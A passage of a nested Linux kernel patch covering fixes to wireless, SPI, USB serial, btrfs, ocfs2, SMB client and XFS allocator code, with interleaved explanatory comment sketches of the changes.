+@@ -4881,8 +4885,11 @@ static void iwl_mvm_mac_flush(struct ieee80211_hw *hw,
+ 
+ 	/* this can take a while, and we may need/want other operations
+ 	 * to succeed while doing this, so do it without the mutex held
++	 * If the firmware is dead, this can't work...
+ 	 */
+-	if (!drop && !iwl_mvm_has_new_tx_api(mvm))
++	if (!drop && !iwl_mvm_has_new_tx_api(mvm) &&
++	    !test_bit(IWL_MVM_STATUS_HW_RESTART_REQUESTED,
++		      &mvm->status))
+ 		iwl_trans_wait_tx_queues_empty(mvm->trans, msk);
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 88b6d4e566c406..0a11ee347bf321 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1366,6 +1366,8 @@ void iwl_mvm_stop_device(struct iwl_mvm *mvm)
+ 
+ 	clear_bit(IWL_MVM_STATUS_FIRMWARE_RUNNING, &mvm->status);
+ 
++	iwl_mvm_pause_tcm(mvm, false);
++
+ 	iwl_fw_dbg_stop_sync(&mvm->fwrt);
+ 	iwl_trans_stop_device(mvm->trans);
+ 	iwl_free_fw_paging(&mvm->fwrt);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index b58441c2af7302..20c5cc72e42699 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -824,8 +824,8 @@ static inline bool iwl_mvm_scan_fits(struct iwl_mvm *mvm, int n_ssids,
+ 	return ((n_ssids <= PROBE_OPTION_MAX) &&
+ 		(n_channels <= mvm->fw->ucode_capa.n_scan_channels) &
+ 		(ies->common_ie_len +
+-		 ies->len[NL80211_BAND_2GHZ] +
+-		 ies->len[NL80211_BAND_5GHZ] <=
++		 ies->len[NL80211_BAND_2GHZ] + ies->len[NL80211_BAND_5GHZ] +
++		 ies->len[NL80211_BAND_6GHZ] <=
+ 		 iwl_mvm_max_scan_ie_fw_cmd_room(mvm)));
+ }
+ 
+@@ -2935,18 +2935,16 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm,
+ 		params.n_channels = j;
+ 	}
+ 
+-	if (non_psc_included &&
+-	    !iwl_mvm_scan_fits(mvm, req->n_ssids, ies, params.n_channels)) {
+-		kfree(params.channels);
+-		return -ENOBUFS;
++	if (!iwl_mvm_scan_fits(mvm, req->n_ssids, ies, params.n_channels)) {
++		ret = -ENOBUFS;
++		goto out;
+ 	}
+ 
+ 	uid = iwl_mvm_build_scan_cmd(mvm, vif, &hcmd, &params, type);
+-
+-	if (non_psc_included)
+-		kfree(params.channels);
+-	if (uid < 0)
+-		return uid;
++	if (uid < 0) {
++		ret = uid;
++		goto out;
++	}
+ 
+ 	ret = iwl_mvm_send_cmd(mvm, &hcmd);
+ 	if (!ret) {
+@@ -2963,6 +2961,9 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm,
+ 		mvm->sched_scan_pass_all = SCHED_SCAN_PASS_ALL_DISABLED;
+ 	}
+ 
++out:
++	if (non_psc_included)
++		kfree(params.channels);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c b/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c
+index 75fd386b048e9b..35c60faf8e8fbd 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c
+@@ -68,7 +68,8 @@ iwl_pcie_ctxt_info_dbg_enable(struct iwl_trans *trans,
+ 		}
+ 		break;
+ 	default:
+-		IWL_ERR(trans, "WRT: Invalid buffer destination\n");
++		IWL_DEBUG_FW(trans, "WRT: Invalid buffer destination (%d)\n",
++			     le32_to_cpu(fw_mon_cfg->buf_location));
+ 	}
+ out:
+ 	if (dbg_flags)
+diff --git a/drivers/pinctrl/pinctrl-at91.c b/drivers/pinctrl/pinctrl-at91.c
+index ff3b6a8a0b1707..333f9d70c7f48f 100644
+--- a/drivers/pinctrl/pinctrl-at91.c
++++ b/drivers/pinctrl/pinctrl-at91.c
+@@ -1420,8 +1420,11 @@ static int at91_pinctrl_probe(struct platform_device *pdev)
+ 
+ 	/* We will handle a range of GPIO pins */
+ 	for (i = 0; i < gpio_banks; i++)
+-		if (gpio_chips[i])
++		if (gpio_chips[i]) {
+ 			pinctrl_add_gpio_range(info->pctl, &gpio_chips[i]->range);
++			gpiochip_add_pin_range(&gpio_chips[i]->chip, dev_name(info->pctl->dev), 0,
++				gpio_chips[i]->range.pin_base, gpio_chips[i]->range.npins);
++		}
+ 
+ 	dev_info(&pdev->dev, "initialized AT91 pinctrl driver\n");
+ 
+diff --git a/drivers/powercap/intel_rapl_msr.c b/drivers/powercap/intel_rapl_msr.c
+index 65adb4cbaaf8e3..e46a7641e42f69 100644
+--- a/drivers/powercap/intel_rapl_msr.c
++++ b/drivers/powercap/intel_rapl_msr.c
+@@ -136,12 +136,12 @@ static int rapl_msr_write_raw(int cpu, struct reg_action *ra)
+ 
+ /* List of verified CPUs. */
+ static const struct x86_cpu_id pl4_support_ids[] = {
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_TIGERLAKE_L, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_ALDERLAKE, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_ALDERLAKE_L, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_ALDERLAKE_N, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_RAPTORLAKE, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_RAPTORLAKE_P, X86_FEATURE_ANY },
++	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P, NULL),
+ 	{}
+ };
+ 
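/*
 * (Editorial sketch.) The rapl hunk above replaces open-coded x86_cpu_id
 * initializers with the standard X86_MATCH_INTEL_FAM6_MODEL() macro. A
 * minimal consumer of such a table; the helper name is invented, but the
 * macro and x86_match_cpu() are the real <asm/cpu_device_id.h> /
 * <asm/intel-family.h> interfaces the hunk switches to.
 */
#include <asm/cpu_device_id.h>
#include <asm/intel-family.h>

static const struct x86_cpu_id demo_ids[] = {
	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L, NULL),
	{}
};

static bool demo_cpu_supported(void)
{
	/* returns the matching entry, or NULL if this CPU is not listed */
	return x86_match_cpu(demo_ids) != NULL;
}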
+diff --git a/drivers/scsi/lpfc/lpfc_bsg.c b/drivers/scsi/lpfc/lpfc_bsg.c
+index 2373dad016033e..fc300febe91401 100644
+--- a/drivers/scsi/lpfc/lpfc_bsg.c
++++ b/drivers/scsi/lpfc/lpfc_bsg.c
+@@ -5409,7 +5409,7 @@ lpfc_get_cgnbuf_info(struct bsg_job *job)
+ 	struct get_cgnbuf_info_req *cgnbuf_req;
+ 	struct lpfc_cgn_info *cp;
+ 	uint8_t *cgn_buff;
+-	int size, cinfosz;
++	size_t size, cinfosz;
+ 	int  rc = 0;
+ 
+ 	if (job->request_len < sizeof(struct fc_bsg_request) +
+diff --git a/drivers/spi/spi-bcm63xx.c b/drivers/spi/spi-bcm63xx.c
+index 147199002df1e6..a9921dcd6b7972 100644
+--- a/drivers/spi/spi-bcm63xx.c
++++ b/drivers/spi/spi-bcm63xx.c
+@@ -482,6 +482,7 @@ static const struct of_device_id bcm63xx_spi_of_match[] = {
+ 	{ .compatible = "brcm,bcm6358-spi", .data = &bcm6358_spi_reg_offsets },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, bcm63xx_spi_of_match);
+ 
+ static int bcm63xx_spi_probe(struct platform_device *pdev)
+ {
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 477c3578e7d9e1..81a3cf92534525 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -694,6 +694,7 @@ static struct class *spidev_class;
+ static const struct spi_device_id spidev_spi_ids[] = {
+ 	{ .name = "bh2228fv" },
+ 	{ .name = "dh2228fv" },
++	{ .name = "jg10309-01" },
+ 	{ .name = "ltc2488" },
+ 	{ .name = "sx1301" },
+ 	{ .name = "bk4" },
+@@ -722,6 +723,7 @@ static int spidev_of_check(struct device *dev)
+ static const struct of_device_id spidev_dt_ids[] = {
+ 	{ .compatible = "cisco,spi-petra", .data = &spidev_of_check },
+ 	{ .compatible = "dh,dhcom-board", .data = &spidev_of_check },
++	{ .compatible = "elgin,jg10309-01", .data = &spidev_of_check },
+ 	{ .compatible = "lineartechnology,ltc2488", .data = &spidev_of_check },
+ 	{ .compatible = "lwn,bk4", .data = &spidev_of_check },
+ 	{ .compatible = "menlo,m53cpld", .data = &spidev_of_check },
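/*
 * (Editorial sketch.) Both SPI hunks above extend driver ID tables, and the
 * bcm63xx hunk adds the MODULE_DEVICE_TABLE() that was missing. A minimal
 * version of the pattern, with an invented compatible string: without the
 * MODULE_DEVICE_TABLE() line no modalias aliases are emitted, so userspace
 * cannot autoload the module when a matching device tree node appears.
 */
#include <linux/module.h>
#include <linux/mod_devicetable.h>

static const struct of_device_id demo_dt_ids[] = {
	{ .compatible = "vendor,demo-device" },
	{ }
};
MODULE_DEVICE_TABLE(of, demo_dt_ids);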
+diff --git a/drivers/usb/class/usbtmc.c b/drivers/usb/class/usbtmc.c
+index 311007b1d90465..c2e666e82857c1 100644
+--- a/drivers/usb/class/usbtmc.c
++++ b/drivers/usb/class/usbtmc.c
+@@ -754,7 +754,7 @@ static struct urb *usbtmc_create_urb(void)
+ 	if (!urb)
+ 		return NULL;
+ 
+-	dmabuf = kmalloc(bufsize, GFP_KERNEL);
++	dmabuf = kzalloc(bufsize, GFP_KERNEL);
+ 	if (!dmabuf) {
+ 		usb_free_urb(urb);
+ 		return NULL;
+diff --git a/drivers/usb/serial/pl2303.c b/drivers/usb/serial/pl2303.c
+index 8949c1891164bd..05ca236023bbfe 100644
+--- a/drivers/usb/serial/pl2303.c
++++ b/drivers/usb/serial/pl2303.c
+@@ -118,6 +118,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(SMART_VENDOR_ID, SMART_PRODUCT_ID) },
+ 	{ USB_DEVICE(AT_VENDOR_ID, AT_VTKIT3_PRODUCT_ID) },
+ 	{ USB_DEVICE(IBM_VENDOR_ID, IBM_PRODUCT_ID) },
++	{ USB_DEVICE(MACROSILICON_VENDOR_ID, MACROSILICON_MS3020_PRODUCT_ID) },
+ 	{ }					/* Terminating entry */
+ };
+ 
+diff --git a/drivers/usb/serial/pl2303.h b/drivers/usb/serial/pl2303.h
+index 732f9b13ad5d59..d60eda7f6edaf8 100644
+--- a/drivers/usb/serial/pl2303.h
++++ b/drivers/usb/serial/pl2303.h
+@@ -171,3 +171,7 @@
+ /* Allied Telesis VT-Kit3 */
+ #define AT_VENDOR_ID		0x0caa
+ #define AT_VTKIT3_PRODUCT_ID	0x3001
++
++/* Macrosilicon MS3020 */
++#define MACROSILICON_VENDOR_ID		0x345f
++#define MACROSILICON_MS3020_PRODUCT_ID	0x3020
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 4cbf386166209c..a47c8b45099698 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -384,17 +384,19 @@ void btrfs_update_global_block_rsv(struct btrfs_fs_info *fs_info)
+ 
+ 	/*
+ 	 * But we also want to reserve enough space so we can do the fallback
+-	 * global reserve for an unlink, which is an additional 5 items (see the
+-	 * comment in __unlink_start_trans for what we're modifying.)
++	 * global reserve for an unlink, which is an additional
++	 * BTRFS_UNLINK_METADATA_UNITS items.
+ 	 *
+ 	 * But we also need space for the delayed ref updates from the unlink,
+-	 * so its 10, 5 for the actual operation, and 5 for the delayed ref
+-	 * updates.
++	 * so add BTRFS_UNLINK_METADATA_UNITS units for delayed refs, one for
++	 * each unlink metadata item.
+ 	 */
+-	min_items += 10;
++	min_items += BTRFS_UNLINK_METADATA_UNITS;
+ 
+ 	num_bytes = max_t(u64, num_bytes,
+-			  btrfs_calc_insert_metadata_size(fs_info, min_items));
++			  btrfs_calc_insert_metadata_size(fs_info, min_items) +
++			  btrfs_calc_delayed_ref_bytes(fs_info,
++					       BTRFS_UNLINK_METADATA_UNITS));
+ 
+ 	spin_lock(&sinfo->lock);
+ 	spin_lock(&block_rsv->lock);
+diff --git a/fs/btrfs/block-rsv.h b/fs/btrfs/block-rsv.h
+index df87c4949d0657..fd8bfaf26da512 100644
+--- a/fs/btrfs/block-rsv.h
++++ b/fs/btrfs/block-rsv.h
+@@ -50,6 +50,18 @@ struct btrfs_block_rsv {
+ 	u64 qgroup_rsv_reserved;
+ };
+ 
++/*
++ * Number of metadata items necessary for an unlink operation:
++ *
++ * 1 for the possible orphan item
++ * 1 for the dir item
++ * 1 for the dir index
++ * 1 for the inode ref
++ * 1 for the inode
++ * 1 for the parent inode
++ */
++#define BTRFS_UNLINK_METADATA_UNITS		6
++
+ void btrfs_init_block_rsv(struct btrfs_block_rsv *rsv, enum btrfs_rsv_type type);
+ void btrfs_init_root_block_rsv(struct btrfs_root *root);
+ struct btrfs_block_rsv *btrfs_alloc_block_rsv(struct btrfs_fs_info *fs_info,
+diff --git a/fs/btrfs/delayed-ref.h b/fs/btrfs/delayed-ref.h
+index 712a6315e956b7..d325bf2948673d 100644
+--- a/fs/btrfs/delayed-ref.h
++++ b/fs/btrfs/delayed-ref.h
+@@ -253,6 +253,27 @@ extern struct kmem_cache *btrfs_delayed_extent_op_cachep;
+ int __init btrfs_delayed_ref_init(void);
+ void __cold btrfs_delayed_ref_exit(void);
+ 
++static inline u64 btrfs_calc_delayed_ref_bytes(struct btrfs_fs_info *fs_info,
++					       int num_delayed_refs)
++{
++	u64 num_bytes;
++
++	num_bytes = btrfs_calc_insert_metadata_size(fs_info, num_delayed_refs);
++
++	/*
++	 * We have to check the mount option here because we could be enabling
++	 * the free space tree for the first time and don't have the compat_ro
++	 * option set yet.
++	 *
++	 * We need extra reservations if we have the free space tree because
++	 * we'll have to modify that tree as well.
++	 */
++	if (btrfs_test_opt(fs_info, FREE_SPACE_TREE))
++		num_bytes *= 2;
++
++	return num_bytes;
++}
++
+ static inline void btrfs_init_generic_ref(struct btrfs_ref *generic_ref,
+ 				int action, u64 bytenr, u64 len, u64 parent)
+ {
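/*
 * (Editorial sketch.) How the new btrfs_calc_delayed_ref_bytes() helper
 * composes with the existing insert-size estimate, mirroring the block-rsv
 * hunk above; the wrapper name is invented, both callees are the helpers
 * shown in the patch.
 */
static u64 demo_unlink_reservation(struct btrfs_fs_info *fs_info)
{
	u64 items = btrfs_calc_insert_metadata_size(fs_info,
						    BTRFS_UNLINK_METADATA_UNITS);
	u64 refs = btrfs_calc_delayed_ref_bytes(fs_info,
						BTRFS_UNLINK_METADATA_UNITS);

	/* refs is doubled internally when the free space tree is enabled */
	return items + refs;
}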
+diff --git a/fs/ocfs2/xattr.c b/fs/ocfs2/xattr.c
+index 55699c5735413b..3ba40f16ef056b 100644
+--- a/fs/ocfs2/xattr.c
++++ b/fs/ocfs2/xattr.c
+@@ -1066,13 +1066,13 @@ ssize_t ocfs2_listxattr(struct dentry *dentry,
+ 	return i_ret + b_ret;
+ }
+ 
+-static int ocfs2_xattr_find_entry(int name_index,
++static int ocfs2_xattr_find_entry(struct inode *inode, int name_index,
+ 				  const char *name,
+ 				  struct ocfs2_xattr_search *xs)
+ {
+ 	struct ocfs2_xattr_entry *entry;
+ 	size_t name_len;
+-	int i, cmp = 1;
++	int i, name_offset, cmp = 1;
+ 
+ 	if (name == NULL)
+ 		return -EINVAL;
+@@ -1080,13 +1080,22 @@ static int ocfs2_xattr_find_entry(int name_index,
+ 	name_len = strlen(name);
+ 	entry = xs->here;
+ 	for (i = 0; i < le16_to_cpu(xs->header->xh_count); i++) {
++		if ((void *)entry >= xs->end) {
++			ocfs2_error(inode->i_sb, "corrupted xattr entries");
++			return -EFSCORRUPTED;
++		}
+ 		cmp = name_index - ocfs2_xattr_get_type(entry);
+ 		if (!cmp)
+ 			cmp = name_len - entry->xe_name_len;
+-		if (!cmp)
+-			cmp = memcmp(name, (xs->base +
+-				     le16_to_cpu(entry->xe_name_offset)),
+-				     name_len);
++		if (!cmp) {
++			name_offset = le16_to_cpu(entry->xe_name_offset);
++			if ((xs->base + name_offset + name_len) > xs->end) {
++				ocfs2_error(inode->i_sb,
++					    "corrupted xattr entries");
++				return -EFSCORRUPTED;
++			}
++			cmp = memcmp(name, (xs->base + name_offset), name_len);
++		}
+ 		if (cmp == 0)
+ 			break;
+ 		entry += 1;
+@@ -1170,7 +1179,7 @@ static int ocfs2_xattr_ibody_get(struct inode *inode,
+ 	xs->base = (void *)xs->header;
+ 	xs->here = xs->header->xh_entries;
+ 
+-	ret = ocfs2_xattr_find_entry(name_index, name, xs);
++	ret = ocfs2_xattr_find_entry(inode, name_index, name, xs);
+ 	if (ret)
+ 		return ret;
+ 	size = le64_to_cpu(xs->here->xe_value_size);
+@@ -2702,7 +2711,7 @@ static int ocfs2_xattr_ibody_find(struct inode *inode,
+ 
+ 	/* Find the named attribute. */
+ 	if (oi->ip_dyn_features & OCFS2_INLINE_XATTR_FL) {
+-		ret = ocfs2_xattr_find_entry(name_index, name, xs);
++		ret = ocfs2_xattr_find_entry(inode, name_index, name, xs);
+ 		if (ret && ret != -ENODATA)
+ 			return ret;
+ 		xs->not_found = ret;
+@@ -2837,7 +2846,7 @@ static int ocfs2_xattr_block_find(struct inode *inode,
+ 		xs->end = (void *)(blk_bh->b_data) + blk_bh->b_size;
+ 		xs->here = xs->header->xh_entries;
+ 
+-		ret = ocfs2_xattr_find_entry(name_index, name, xs);
++		ret = ocfs2_xattr_find_entry(inode, name_index, name, xs);
+ 	} else
+ 		ret = ocfs2_xattr_index_block_find(inode, blk_bh,
+ 						   name_index,
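/*
 * (Editorial sketch.) The ocfs2 hunks validate the entry pointer and the
 * name offset against the end of the xattr buffer before dereferencing
 * either. The same defensive pattern in isolation, with invented names:
 * check offset + length against the buffer end before memcmp().
 */
#include <linux/string.h>
#include <linux/errno.h>

static int demo_name_cmp_checked(const char *base, const char *end,
				 const char *name, size_t name_len,
				 size_t name_offset)
{
	if (base + name_offset + name_len > end)
		return -EUCLEAN;	/* on-disk corruption: refuse to read */
	return memcmp(name, base + name_offset, name_len);
}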
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 21b344762d0f88..87ce71b39b7711 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -673,6 +673,19 @@ allocate_buffers(struct TCP_Server_Info *server)
+ static bool
+ server_unresponsive(struct TCP_Server_Info *server)
+ {
++	/*
++	 * If we're in the process of mounting a share or reconnecting a session
++	 * and the server abruptly shut down (e.g. socket wasn't closed, packet
++	 * had been ACK'ed but no SMB response), don't wait longer than 20s to
++	 * negotiate protocol.
++	 */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsInNegotiate &&
++	    time_after(jiffies, server->lstrp + 20 * HZ)) {
++		spin_unlock(&server->srv_lock);
++		cifs_reconnect(server, false);
++		return true;
++	}
+ 	/*
+ 	 * We need to wait 3 echo intervals to make sure we handle such
+ 	 * situations right:
+@@ -684,7 +697,6 @@ server_unresponsive(struct TCP_Server_Info *server)
+ 	 * 65s kernel_recvmsg times out, and we see that we haven't gotten
+ 	 *     a response in >60s.
+ 	 */
+-	spin_lock(&server->srv_lock);
+ 	if ((server->tcpStatus == CifsGood ||
+ 	    server->tcpStatus == CifsNeedNegotiate) &&
+ 	    (!server->ops->can_echo || server->ops->can_echo(server)) &&
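/*
 * (Editorial sketch.) The jiffies timeout idiom the cifs hunk relies on;
 * the 20 * HZ bound and the last-response timestamp come from the hunk,
 * the helper name is invented. time_after() handles jiffies wraparound
 * correctly, which a plain ">" comparison would not.
 */
#include <linux/jiffies.h>

static bool demo_negotiate_timed_out(unsigned long last_response)
{
	return time_after(jiffies, last_response + 20 * HZ);
}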
+diff --git a/fs/xfs/libxfs/xfs_ag.c b/fs/xfs/libxfs/xfs_ag.c
+index bb0c700afe3cb1..bf47efe08a58d5 100644
+--- a/fs/xfs/libxfs/xfs_ag.c
++++ b/fs/xfs/libxfs/xfs_ag.c
+@@ -415,10 +415,12 @@ xfs_freesp_init_recs(
+ 		ASSERT(start >= mp->m_ag_prealloc_blocks);
+ 		if (start != mp->m_ag_prealloc_blocks) {
+ 			/*
+-			 * Modify first record to pad stripe align of log
++			 * Modify first record to pad stripe align of log and
++			 * bump the record count.
+ 			 */
+ 			arec->ar_blockcount = cpu_to_be32(start -
+ 						mp->m_ag_prealloc_blocks);
++			be16_add_cpu(&block->bb_numrecs, 1);
+ 			nrec = arec + 1;
+ 
+ 			/*
+@@ -429,7 +431,6 @@ xfs_freesp_init_recs(
+ 					be32_to_cpu(arec->ar_startblock) +
+ 					be32_to_cpu(arec->ar_blockcount));
+ 			arec = nrec;
+-			be16_add_cpu(&block->bb_numrecs, 1);
+ 		}
+ 		/*
+ 		 * Change record start to after the internal log
+@@ -438,15 +439,13 @@ xfs_freesp_init_recs(
+ 	}
+ 
+ 	/*
+-	 * Calculate the record block count and check for the case where
+-	 * the log might have consumed all available space in the AG. If
+-	 * so, reset the record count to 0 to avoid exposure of an invalid
+-	 * record start block.
++	 * Calculate the block count of this record; if it is nonzero,
++	 * increment the record count.
+ 	 */
+ 	arec->ar_blockcount = cpu_to_be32(id->agsize -
+ 					  be32_to_cpu(arec->ar_startblock));
+-	if (!arec->ar_blockcount)
+-		block->bb_numrecs = 0;
++	if (arec->ar_blockcount)
++		be16_add_cpu(&block->bb_numrecs, 1);
+ }
+ 
+ /*
+@@ -458,7 +457,7 @@ xfs_bnoroot_init(
+ 	struct xfs_buf		*bp,
+ 	struct aghdr_init_data	*id)
+ {
+-	xfs_btree_init_block(mp, bp, XFS_BTNUM_BNO, 0, 1, id->agno);
++	xfs_btree_init_block(mp, bp, XFS_BTNUM_BNO, 0, 0, id->agno);
+ 	xfs_freesp_init_recs(mp, bp, id);
+ }
+ 
+@@ -468,7 +467,7 @@ xfs_cntroot_init(
+ 	struct xfs_buf		*bp,
+ 	struct aghdr_init_data	*id)
+ {
+-	xfs_btree_init_block(mp, bp, XFS_BTNUM_CNT, 0, 1, id->agno);
++	xfs_btree_init_block(mp, bp, XFS_BTNUM_CNT, 0, 0, id->agno);
+ 	xfs_freesp_init_recs(mp, bp, id);
+ }
+ 
+diff --git a/fs/xfs/libxfs/xfs_alloc.c b/fs/xfs/libxfs/xfs_alloc.c
+index de79f5d07f6516..8bb024b06b9563 100644
+--- a/fs/xfs/libxfs/xfs_alloc.c
++++ b/fs/xfs/libxfs/xfs_alloc.c
+@@ -3164,10 +3164,13 @@ xfs_alloc_vextent(
+ 	xfs_alloctype_t		type;	/* input allocation type */
+ 	int			bump_rotor = 0;
+ 	xfs_agnumber_t		rotorstep = xfs_rotorstep; /* inode32 agf stepper */
++	xfs_agnumber_t		minimum_agno = 0;
+ 
+ 	mp = args->mp;
+ 	type = args->otype = args->type;
+ 	args->agbno = NULLAGBLOCK;
++	if (args->tp->t_firstblock != NULLFSBLOCK)
++		minimum_agno = XFS_FSB_TO_AGNO(mp, args->tp->t_firstblock);
+ 	/*
+ 	 * Just fix this up, for the case where the last a.g. is shorter
+ 	 * (or there's only one a.g.) and the caller couldn't easily figure
+@@ -3201,6 +3204,13 @@ xfs_alloc_vextent(
+ 		 */
+ 		args->agno = XFS_FSB_TO_AGNO(mp, args->fsbno);
+ 		args->pag = xfs_perag_get(mp, args->agno);
++
++		if (minimum_agno > args->agno) {
++			trace_xfs_alloc_vextent_skip_deadlock(args);
++			error = 0;
++			break;
++		}
++
+ 		error = xfs_alloc_fix_freelist(args, 0);
+ 		if (error) {
+ 			trace_xfs_alloc_vextent_nofix(args);
+@@ -3232,6 +3242,8 @@ xfs_alloc_vextent(
+ 	case XFS_ALLOCTYPE_FIRST_AG:
+ 		/*
+ 		 * Rotate through the allocation groups looking for a winner.
++		 * If we are blocking, we must obey minimum_agno constraints for
++		 * avoiding ABBA deadlocks on AGF locking.
+ 		 */
+ 		if (type == XFS_ALLOCTYPE_FIRST_AG) {
+ 			/*
+@@ -3239,7 +3251,7 @@ xfs_alloc_vextent(
+ 			 */
+ 			args->agno = XFS_FSB_TO_AGNO(mp, args->fsbno);
+ 			args->type = XFS_ALLOCTYPE_THIS_AG;
+-			sagno = 0;
++			sagno = minimum_agno;
+ 			flags = 0;
+ 		} else {
+ 			/*
+@@ -3248,6 +3260,7 @@ xfs_alloc_vextent(
+ 			args->agno = sagno = XFS_FSB_TO_AGNO(mp, args->fsbno);
+ 			flags = XFS_ALLOC_FLAG_TRYLOCK;
+ 		}
++
+ 		/*
+ 		 * Loop over allocation groups twice; first time with
+ 		 * trylock set, second time without.
+@@ -3276,19 +3289,21 @@ xfs_alloc_vextent(
+ 			if (args->agno == sagno &&
+ 			    type == XFS_ALLOCTYPE_START_BNO)
+ 				args->type = XFS_ALLOCTYPE_THIS_AG;
++
+ 			/*
+-			* For the first allocation, we can try any AG to get
+-			* space.  However, if we already have allocated a
+-			* block, we don't want to try AGs whose number is below
+-			* sagno. Otherwise, we may end up with out-of-order
+-			* locking of AGF, which might cause deadlock.
+-			*/
++			 * If we are try-locking, we can't deadlock on AGF
++			 * locks, so we can wrap all the way back to the first
++			 * AG. Otherwise, wrap back to the start AG so we can't
++			 * deadlock, and let the end of scan handler decide what
++			 * to do next.
++			 */
+ 			if (++(args->agno) == mp->m_sb.sb_agcount) {
+-				if (args->tp->t_firstblock != NULLFSBLOCK)
+-					args->agno = sagno;
+-				else
++				if (flags & XFS_ALLOC_FLAG_TRYLOCK)
+ 					args->agno = 0;
++				else
++					args->agno = sagno;
+ 			}
++
+ 			/*
+ 			 * Reached the starting a.g., must either be done
+ 			 * or switch to non-trylock mode.
+@@ -3300,7 +3315,14 @@ xfs_alloc_vextent(
+ 					break;
+ 				}
+ 
++				/*
++				 * Blocking pass next, so we must obey minimum
++				 * agno constraints to avoid ABBA AGF deadlocks.
++				 */
+ 				flags = 0;
++				if (minimum_agno > sagno)
++					sagno = minimum_agno;
++
+ 				if (type == XFS_ALLOCTYPE_START_BNO) {
+ 					args->agbno = XFS_FSB_TO_AGBNO(mp,
+ 						args->fsbno);
+@@ -3322,9 +3344,9 @@ xfs_alloc_vextent(
+ 		ASSERT(0);
+ 		/* NOTREACHED */
+ 	}
+-	if (args->agbno == NULLAGBLOCK)
++	if (args->agbno == NULLAGBLOCK) {
+ 		args->fsbno = NULLFSBLOCK;
+-	else {
++	} else {
+ 		args->fsbno = XFS_AGB_TO_FSB(mp, args->agno, args->agbno);
+ #ifdef DEBUG
+ 		ASSERT(args->len >= args->minlen);
+@@ -3335,6 +3357,29 @@ xfs_alloc_vextent(
+ #endif
+ 
+ 	}
++
++	/*
++	 * We end up here with a locked AGF. If we failed, the caller is likely
++	 * going to try to allocate again with different parameters, and that
++	 * can widen the AGs that are searched for free space. If we have to do
++	 * BMBT block allocation, we have to do a new allocation.
++	 *
++	 * Hence leaving this function with the AGF locked opens up potential
++	 * ABBA AGF deadlocks because a future allocation attempt in this
++	 * transaction may attempt to lock a lower number AGF.
++	 *
++	 * We can't release the AGF until the transaction is committed, so at
++	 * this point we must update the "firstblock" tracker to point at this
++	 * AG if the tracker is empty or points to a lower AG. This allows the
++	 * next allocation attempt to be modified appropriately to avoid
++	 * deadlocks.
++	 */
++	if (args->agbp &&
++	    (args->tp->t_firstblock == NULLFSBLOCK ||
++	     args->pag->pag_agno > minimum_agno)) {
++		args->tp->t_firstblock = XFS_AGB_TO_FSB(mp,
++					args->pag->pag_agno, 0);
++	}
+ 	xfs_perag_put(args->pag);
+ 	return 0;
+ error0:
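/*
 * (Editorial sketch.) The allocator hunks above enforce one rule: within a
 * single transaction, AGF buffers may only be locked in increasing
 * AG-number order, so any later allocation must start at or above the
 * lowest AG already locked (tracked via t_firstblock). Schematically, with
 * an invented helper:
 */
static bool demo_agf_order_ok(xfs_agnumber_t lowest_locked,
			      xfs_agnumber_t candidate)
{
	/* locking a lower-numbered AGF afterwards risks an ABBA deadlock */
	return candidate >= lowest_locked;
}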
+diff --git a/fs/xfs/libxfs/xfs_bmap.c b/fs/xfs/libxfs/xfs_bmap.c
+index 0d56a8d862e801..9dc33cdc2ab9ca 100644
+--- a/fs/xfs/libxfs/xfs_bmap.c
++++ b/fs/xfs/libxfs/xfs_bmap.c
+@@ -3413,21 +3413,7 @@ xfs_bmap_process_allocated_extent(
+ 	xfs_fileoff_t		orig_offset,
+ 	xfs_extlen_t		orig_length)
+ {
+-	int			nullfb;
+-
+-	nullfb = ap->tp->t_firstblock == NULLFSBLOCK;
+-
+-	/*
+-	 * check the allocation happened at the same or higher AG than
+-	 * the first block that was allocated.
+-	 */
+-	ASSERT(nullfb ||
+-		XFS_FSB_TO_AGNO(args->mp, ap->tp->t_firstblock) <=
